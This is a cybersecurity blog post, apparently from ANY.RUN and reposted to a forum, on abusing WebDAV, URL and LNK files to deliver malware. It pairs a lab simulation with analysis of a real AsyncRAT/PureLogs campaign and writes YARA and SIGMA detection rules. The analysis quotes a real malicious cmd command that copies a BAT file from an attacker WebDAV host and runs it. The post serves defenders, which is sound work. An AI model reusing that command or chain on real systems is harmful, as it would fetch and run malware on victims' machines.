Client-Side Exploitation: abusing WebDAV+URL+LNK to Deliver Malicious Payloads

Post a Comment

A look at the offensive and defensive angles. 

What is WebDav? 

Attackers often place malicious payloads on remote servers, which are then downloaded and executed on the user’s PC using scripts or other methods. One type of server attackers can leverage is WebDAV (Web Distributed Authoring and Versioning) — a file transfer protocol built on top of HTTP. 

In this article, we’ll explore how an attack is carried out from the offensive perspective, and then examine how to detect and defend against it defensively. 

First, we’ll simulate an attack using a WebDAV server targeting a client PC to understand what it looks like offensively. Then from the defensive side, we’ll analyze a real-world example that loads malware like AsyncRat/Purelogs, discuss detection methods, and write some detection rules. 

The offensive view 

To simulate the attack, we need two hosts: one running a Linux OS (we’ll use Kali Linux), and the other running Windows (we’ll use the ANY.RUN virtual machine). 

First, let’s connect the ANY.RUN Sandbox to the local network (if unsure how, check this article). We’ll use ping command to verify connectivity:

Successful connection to the attacker’s host

Don’t have an ANY.RUN account yet?
Get started now! 

Register for free

Next, we’ll create a shortcut file (LNK) that launches the calculator using the command line:

Properties of the created LNK-file 

Since the shortcut needs to be on a remote WebDAV server to auto-download and execute, we’ll upload it using the scp command: 

The file was successfully copied to the attacking server.

For added stealth, instead of directly accessing the LNK, we’ll add a proxy stage — a URL pointing to a file containing the link to the attacking WebDAV server hosting the LNK. This URL file is what the victim will run: 

URL file linking to the tag 

The last preparation step is to start the WebDAV server. We’ll use the WsgiDAV server for this. Connect to the attacking server via SSH: 

Sucesfull SSH connection

Then we can start the WebDAV server on port 3001 using the current working directory: 

WebDAV server has started on port 3001 

Everything is ready, now we just need to execute the URL file: 

Result of executing the command 

We see the command executed successfully and the calculator launched. Meanwhile, the WebDAV server logs show the connection from the user’s computer: 

LNK file download logs from WebDav server

Now we understand what a client-side WebDAV exploit looks like offensively. Let’s examine a real-world example found in our public submissions. 

The defensive view

As an example, we will partially analyze this task. In this example, the attack started with a phishing email and ended with AsyncRAT, PureLogs, and other malware being downloaded. The execution chain was:

Visualization of the execution chain 

While there are many IOCs and detection vectors, we’ll focus on those directly relating to WebDAV exploitation: 

  1. The URL file linking to the malicious LNK 
  1. The LNK file containing malicious commands 
  1. The network connection to the attacking server 

Like our simulation, the actual attack used a URL file delivered in a zipped Dropbox download. This URL contained a link to the malicious LNK file: 

Contents of the URL of the file the user is executing viewed in ANY.RUN sandbox 

Follow along with the defensive view example in ANY.RUN 

Sign up for free

Interestingly, the file points to the TryCloudFlare phishing domain, and the port is specified as SSL instead of a number. We also see the link contains the WebDAV directory name DavWWWRoot and the .lnk extension. 

To detect such a malicious URL file, we can create a YARA rule: 

rule url_file 

{  

    meta:  

        author = "ANY.RUN"  

        description = "Rule identifying shortcut (LNK) with cmd command copy and start bat"  

    strings:  

        $url_lnk = { 5B 49 6E 74 65 72 6E 65 74 53 68 6F 72 74 63 75 74 5D }  

        $url_file = "URL=file://" ascii 

    condition:  

        $url_lnk at 0 and $url_file  

} 

When the user launches the malicious URL file, an LNK file with a randomly generated GUID name is saved to the temporary Tfs_DAV directory. 

Examining the created LNK, we see it contains a CMD command to copy a BAT file from the WebDAV server directory to %USERPROFILE%\Pictures on the user’s PC, and then execute it: 

C:\Windows\System32\cmd.exe /c copy “\101.99[.]94.234@9809\DavWWWRoot\file.bat” “%USERPROFILE%\Pictures\file.bat” && “%USERPROFILE%\Pictures\file.bat”

Since the malicious LNK is created on disk, we can write a YARA hunting rule to detect it: 

rule lnk_file  

{   

    meta:   

        author = "ANY.RUN"   

        description = "Rule identifying shortcut (LNK) with WebDAV"   

    strings:   

        $lnk = { 4C 00 00 00 01 14 02 00 }   

        $webdav = /\\\\[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}@\d{2,4}/ wide 

    condition:   

        $lnk at 0 and $webdav   

} 

We also see that when the malicious LNK is executed, a specific command line is used that points to the remote server. We can detect this pattern using a SIGMA rule:

title: WebDav in cmdline  

status: test  

description: Detects WebDav in cmdline   

references: https://app.any.run/tasks/86851211-8c9c-4e23-af71-b62d6cbfe14c/  

author: ANY.RUN  

date: 2024/04/21  

tags: attack.t1071.001  

logsource:  

    category: process_creation  

    product: windows  

detection:  

    selection_target:  

        CommandLine||re: "\\\\.+@.+\\"  

    selection_image:  

        Image|endswith:  

        -'\cmd.exe' 

        -'\powershell.exe' 

    condition: selection_target and selection_image 

falsepositives:   

    unknown  

level: medium 

As a result, the payload is downloaded from the remote server, creating network connection artifacts that we can detect. 

Having the network connection allows us to add another Suricata rule for detection:

To match the WebDAV link itself, we can use this regular expression in a tool like CyberChef: 

Link to Cyberchef 

So, in summary, we’ve written YARA, Suricata, and SIGMA hunting rules to detect this type of WebDAV exploitation attack. 

How to block URL execution 

While we’ve learned how to detect these attacks, it’s also important as defenders to prevent them. One mitigation is to block the execution of URL files in Windows settings: 

Materials to use for further research 

Searching for and studying this attack vector can be done using our threat intelligence service and the detected artifacts. For example, using a regex on the command line: 

CommandLine:"\\\\*@*\\" 

The URL filter can also find relevant results: 

URL:"*.lnk$" 

Finally, you can search for triggered Suricata rules: 

SuricataMessage:"ET INFO LNK File Downloaded via HTTP" 

We’ve prepared some example results for further analysis: 

Conclusions 

In this article, we looked at client-side exploitation techniques abusing WebDAV and LNK files to deliver malware. We wrote rules to detect malicious URL/LNK files, command line indicators, and network connections to WebDAV servers. Preventing LNK/URL execution through Windows settings is also an effective control. 

About ANY.RUN 

ANY.RUN’s flagship product is an interactive malware sandbox that helps security teams efficiently analyze malware. 

Every day, a community of 400,000 analysts and 3000 corporate clients use our cloud-based platform to analyze Windows and Linux threats. 

Integrate ANY.RUN Threat Intelligence in your organization 

Contact Sales

Key advantages of ANY.RUN for businesses: 

  • Interactive analysis: Analysts can “play with the sample” in a VM to learn more about its behavior. 
  • Fast and easy configuration. Launch VMs with different configurations in a matter of seconds. 
  • Fast detection: Detects malware within roughly 40 seconds of uploading a file. 
  • Cloud-based solution eliminates setup and maintenance costs. 
  • Intuitive interface: Enables even junior SOC analysts to conduct malware analysis. 

Learn how ANY.RUN can benefit you or your security team. Schedule a free demo with one of our sales representatives, and we’ll walk you through real-world examples. 

Schedule a demo → 

The post Client-Side Exploitation: abusing WebDAV+URL+LNK to Deliver Malicious Payloads appeared first on ANY.RUN's Cybersecurity Blog.

Article Link: Client-Side Exploitation: WebDAV+URL+LNK Abuse

1 post - 1 participant

Read full topic



Malware Analysis, News and Indicators - Latest topics
Sp123
"The real threat is actually not when the computer begins to think like a human, but when humans begin to think like computers."

Post a Comment